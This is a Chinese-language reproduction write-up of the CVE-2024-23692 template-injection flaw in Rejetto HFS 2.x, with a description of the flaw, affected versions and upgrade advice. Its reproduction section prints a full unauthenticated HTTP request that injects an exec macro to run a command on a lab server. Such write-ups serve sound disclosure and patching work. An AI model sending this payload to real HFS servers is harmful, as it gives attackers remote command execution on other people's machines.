HFS文件服务器RCE 漏洞复现(CVE-2024-23692)
1.漏洞描述
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS)2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692
影响版本
HFS 版本 2.4.0 RC7 和 2.3m
CVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。此模板包含来自请求的搜索查询参数的内容,该内容未正确转义,从而启用了 SSTI
在正常操作下,符号和宏会被编码以防止 SSTI。但是,通过强制服务器取消转义某些字符,攻击者可以将任意宏注入模板
2.漏洞复现
在此漏洞中,%url%
符号未转义,允许 URL 的其余部分回显到服务器端内容中。通过操纵搜索查询参数,攻击者可以关闭默认模板标记并注入任意命令
GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: 192.168.2.129
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: HFS_SID_=nJhD39Qx5kAAAABHR7bhPw
Connection: close
Stephen Fewer 将此漏洞的可利用性评定为非常高,因为远程未经身份验证的攻击者可以利用此漏洞。但是,由于 HFS 通常不用作企业级 Web 服务器,因此攻击者的价值被认为很低。尽管如此,受影响系统受到损害的可能性仍然很大,尤其是对于依赖 HFS 进行个人或小型企业文件共享的用户而言。
安全研究员Arseniy Sharoglazov发现了该漏洞,Stephen Fewer 提供了 Metasploit 的详细分析和漏洞利用模块。有关详细的技术信息和Metasploit 模块,用户可以参考Stephen Fewer 在 AttackerKB 上发表的原始文章
参考:https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/
3.漏洞修复
针对HFS版本2.x的补丁已经缺失,因为该版本的维护者不再支持。强烈建议用户升级到Rejetto HFS的版本3.x,以免受到这一漏洞的影响